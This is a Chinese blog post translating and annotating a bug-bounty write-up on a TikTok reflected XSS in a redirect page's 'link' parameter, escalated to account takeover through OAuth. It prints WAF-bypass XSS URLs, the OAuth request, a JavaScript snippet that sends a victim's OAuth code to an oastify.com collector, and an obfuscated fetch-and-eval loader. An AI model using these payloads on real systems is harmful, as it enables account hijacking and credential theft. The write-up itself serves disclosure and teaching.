【海外SRC赏金挖掘】拿下TikTok：从xss到任意用户接管！！

fkalis

已于 2024-10-08 23:20:53 修改

阅读量608

点赞数 10

分类专栏：红蓝攻防网络安全海外src挖掘文章标签：网络安全安全 web安全安全威胁分析 xss 网络攻击模型

于 2024-10-08 23:08:55 首次发布

本文链接：https://blog.csdn.net/ffr666/article/details/142771645

版权

红蓝攻防同时被 3 个专栏收录

2 篇文章 0 订阅

订阅专栏

网络安全

2 篇文章 0 订阅

订阅专栏

海外src挖掘

1 篇文章 0 订阅

订阅专栏

海外SRC赏金挖掘专栏

在学习SRC，漏洞挖掘，外网打点，渗透测试，攻防打点等的过程中，我很喜欢看一些国外的漏洞报告，总能通过国外的赏金大牛，黑客分享中学习到很多东西，有的是一些新的信息收集方式，又或者是一些骚思路,骚姿势，又或者是苛刻环境的漏洞利用。于是我打算开启这个专栏，将我认为优秀的文章进行翻译，加入我的理解和笔记，方便我自己学习和各位师傅共同进步，我争取做到日更，如果各位师傅觉得有用的话，可以给我点个关注~~ 如果师傅们有什么好的建议也欢迎联系我~~ 感谢各位师傅的支持~~

wx：WingBy_fkalis

公众号：fkalis

正文部分

原文作者：https://medium.com/@mrhavit

不得不说为什么国外这么重视xss，是因为国外的赏金猎人在进行xss挖掘的时候并不只停留在验证阶段（弹窗），更多的是一种拓展性的利用！！

漏洞总结

1. 首先在tiktok的重定向页面发现存在没有进行预编码处理，导致xss

2. 利用特定的poc进行waf的绕过

3. 在httponly存在的条件下，直接获取用户的凭据，而是利用了OAuth的验证模式，进行进一步的利用，最后实现接管

资产范围

https://tiktok.com/

漏洞复现

使用中国的VPN代理，尝试访问 https://tiktok.com/ 时，立即被重定向到另一个网页，上面显示“此页面在您所在的地区不可用”

例如GPT不给国内使用一样，会进行跳转当前地区不可以使用！

通过参数发现url跳转

https://www.tiktok.com/status?status=7&link=https://go.onelink.me/bIdt/[2]

新的重定向 URL 包含一些参数。第一个参数是 “status”，它负责页面内容。第二个参数是 “link”，我们仍然不知道它如何影响页面。

当我们将 “status” 参数的值更改为 “1” 时，页面的内容发生了变化，并出现了一个新按钮。单击该按钮会将您重定向到 “link” 参数的值。这就是 “link” 参数发挥作用的地方。

例如：https://www.tiktok.com/status?status=1&link=https://go.onelink.me/BAuo/[3]

尝试进行xss注入

我们通过插入一些常见的 XSS 有效负载（例如“javascript：alert（）”和“javascript://”）来开始测试“link”参数值，但没有任何变化。重定向链接仍设置为 “https://go.onelink.me/BAuo/”。过了一会儿，我意识到我们其实可以控制这条路。这意味着我们将 “link” 参数值设置为 “https://go.onelink.me/mrhavit/”，它实际上被嵌入到 HTML 中。

https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/[4] 下一步是检查我们是否卡在 “href” 属性中，或者是否可以突破并设置一些事件。正如您可能已经猜到的那样，转义设置不正确，我们能够成功地将新事件插入到 “href” 属性中。

https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/%22%20test[5] 这时，我们意识到 XSS 有很好的线索，并开始深入挖掘。

waf绕过

尝试进行onclick弹窗验证，发现存在waf！

https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/%22%20onclick=alert(1)

由于这是一个非常特殊的情况，并且是一个独特的注入入口点，因此我们在这里没有找到可以在线找到并绕过 WAF 的 XSS 有效负载的快速获胜。因此，我们开始学习如何处理这个 WAF，并试图通过制作一个独特的有效负载来绕过它。绕过 WAF 并非易事。像 “>” 和 “<” 这样的特殊字符被正确地转义/编码，因此通过使用一些编码技巧，成功地插入了 “onclick” 事件。在花了一些时间工作和利用我们的 JavaScript 技能之后，我们终于找到了一个很酷的旁路，让我们能够成功执行 JavaScript！

https://www.tiktok.com/status?status=1&link=https://go.onelink.me/dsa+%0A%0D%0A%0D%22%3C!%3E!%0D%0Atarget=%22_blank%22%0D%0Aοnclick=%0D%0A%22%0D%0Ax=window[%27pr%27%2b%27o%27%2b%27m%27+%2b%27pt%27](%271%27)（%271%27）%0D%0Aompt，%0D%0Ax'Tiktok'

poc分析

poc 解码后如下

https://go.onelink.me/dsa\ 


"<!>!
target="_blank"
onclick=
"
x=window['pr'+'o'+'m'+'pt']('1')('1')
ompt,
x'Tiktok'

我在本地尝试进行复现，需要源码的可以关注私信我！

1. 首先利用" 进行闭合

2. target="_blank" 因为这里是a标签，使用target="_blank"，是为了让onclick函数可以正常执行，不然会直接跳转

3. window'pr'+'o'+'m'+'pt'[7]等效于window.prompt('1')，类似的思路还有top等！

4. 利用x变量作为中间，然后进行传参，再实现弹窗
5. 同时利用了一些特性，比如在html标签中，很多符号可以对空格进行替代，回车等等

危害提升（利用oauth实现接管）

这里比较巧妙的一点就是，常规的HTTPOnly原理就是防止用户直接使用js代码进行cookie的获取，但是不会防止正常的前后端请求，同时cookie是有域的，当你正常请求一个站点的时候，他任然会把cookie携带过去，也就是你在进行oauth的时候，他是带上了你的凭据的，从而实现httponly的绕过接管

帐户接管始终是展示 XSS 漏洞影响的一个很好的例子。虽然由于 HTTPOnly 标志，现在窃取 cookie 很少见，但对目标有足够的了解可以以创造性的方式导致帐户接管。我们通过使用“TikTok OAuth”来实现这一目标。大多数 TikTok 服务都提供“使用 TikTok 登录”作为其登录过程的选项。在本文中，我们将重点介绍“ads.tiktok.com”，但此漏洞也会影响其他服务，例如卖家、商店等。

https://ads.tiktok.com/i18n/login/?source=ads_homepage&lang=en&region=0[8]点击“使用 TikTok 登录”后，显示以下页面：

https://www.tiktok.com/auth/authorize?client_key=aw8cb3204x0a1g88&response_type=code&scope=user.info.basic%2Cuser.info.email%2Cuser.info.phone%2Cuser.info.showcase%2Cvideo.list.no_watermark%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cvideo.list.manage%2Clive.list%2Ccomment.list%2Ccomment.list.manage&version=1&lang=en&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&error_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb[9]

此页面托管在“www.tiktok.com[10]”上，该主机是存在 XSS 漏洞的同一主机。单击“授权”按钮后，生成了以下请求：

POST /passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cuser.account.configure%2Ccomment.list.manage%2Cuser.info.showcase%2Clive.list%2Ccomment.list%2Cvideo.list.private_ads.no_watermark%2Cvideo.list.manage%2Cuser.info.email%2Cvideo.list.no_watermark&aid=1459&source=web&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb HTTP/2
Host: www.tiktok.com
Cookie:.............
Content-Length:2
Sec-Ch-Ua:"Google Chrome";v="113","Chromium";v="113","Not-A.Brand";v="24"
Accept: application/json, text/plain,*/*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Origin: https://www.tiktok.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.tiktok.com/auth/authorize?client_key=aw8cb3204x0a1g88&response_type=code&scope=user.info.basic%2Cuser.info.email%2Cuser.info.phone%2Cuser.info.showcase%2Cvideo.list.no_watermark%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cvideo.list.manage%2Clive.list%2Ccomment.list%2Ccomment.list.manage&version=1&lang=en&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&error_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{}

响应包含一些非常有趣的内容 — OAuth 身份验证的 “代码”。

如果我们将此漏洞与我们的 XSS 漏洞相结合，则只需单击一下就有可能泄露受害者的 OAuth“代码”。虽然 TikTok 在修复此漏洞之前没有看到任何证据表明该漏洞被利用，但获得这些代码的攻击者可以使用它们来接管受害者的帐户。

完整利用链

这里能够进行危害提升的方式主要有两个：

1. 第一点：存在xss的网站和统一授权的网站是同一个，因为是同一个所以可以像下面一样去构造js，在js中去请求ouath去实现接管，但是如果不是同一个网站，也就存在Cors跨域的，就无法构造js去获取到返回值，也就无法获取到认证，本质上上CSRF和Cors漏洞的核心区别。

2. 第二点是aouth每个用户进行授权的时候的url都一样，如果有些特别字段无法构造的话，他的危害也是有限的！

我们创建了一个绕过 WAF 的 JS 负载，并从攻击者的服务器加载了一个新脚本。在我们的示例中，脚本是从 “http://127.0.0.1:5500/asd.js” 加载的。“asd.js”文件包含 JavaScript 代码，该代码将 XHR POST 请求发送到“OAuth”端点，并将响应发送到攻击者控制的服务器。

var xhr =newXMLHttpRequest();
xhr.onload = reqListener;
xhr.open("POST","https://www.tiktok.com/passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cvideo.list.manage%2Ccomment.list%2Clive.list%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cuser.info.showcase%2Cuser.info.email%2Cvideo.list.no_watermark%2Ccomment.list.manage&aid=1459&source=web&redirect_uri=https%3a%2f%2fads.tiktok.com%2fblablablabla&state=64588d019065e001fa8e7abdd884581c10770400");
xhr.withCredentials =true;
xhr.setRequestHeader("Content-Type","application/json");
xhr.send();

function reqListener(){
    location='//rqlu5n70d1zgnxxbz3xzlq09b0hr5ntc.oastify.com/log?key='+this.responseText;
};

响应包含受害者用户的 OAuth“代码”，攻击者可能使用该代码来访问受害者的帐户。在以下视频中，我们演示了受害者如何单击 XSS，并将 OAuth“代码”发送回攻击者的受控服务器。

https://www.tiktok.com/status?status=1&link=https://go.onelink.me/dsa+%0A%0D%0A%0D%22%3C！！%3E！（英文） %0D%0Atarget=%22_blank%22%0D%0Aonclick=%0D%0A%22%0D%0Ax=window[%27ev%27%2b%27a%27%2b%27l%27]（（%27fe%27+%2b+%27tch%27+%2b+%27（%27+%2b+%27%27ht%27+%2b+%27tp%27+%2b+%27%3a//%27+%2b+%27lo%27+%2b+%27ca%27+%2b+%27lho%27+%2b+%27st%27+%2b+%27%3a%27+%2b+%2755%27+%2b+%2700%27+%2b+%27/%27+%2b+%27as%27+%2b+%27d.%27+%2b+%27js%27%27+%2b+%27）%27+%2b+%27.%27+%2b+%27the%27+%2b+%27n（%27+%2b+%27re%27+%2b+%27sp%27+%2b+%27on%27+%2b+%27se%27+%2b+%27%3d%3E%27+%2b+%27re%27+%2b+%27sp%27+%2b+%27on%27+%2b+%27se.%27+%2b+%27te%27+%2b+%27xt(）%27+%2b+%27.%27+%2b+%27the%27+%2b+%27n（%27+%2b+%27te%27+%2b+%27xt%27+%2b+%27%3d%3E%27+%2b+%27ev%27+%2b+%27al%27+%2b+%27（%27+%2b+%27te%27+%2b+%27xt%27+%2b+%27）%27+%2b+%27）%27+%2b+%27）%27））[11]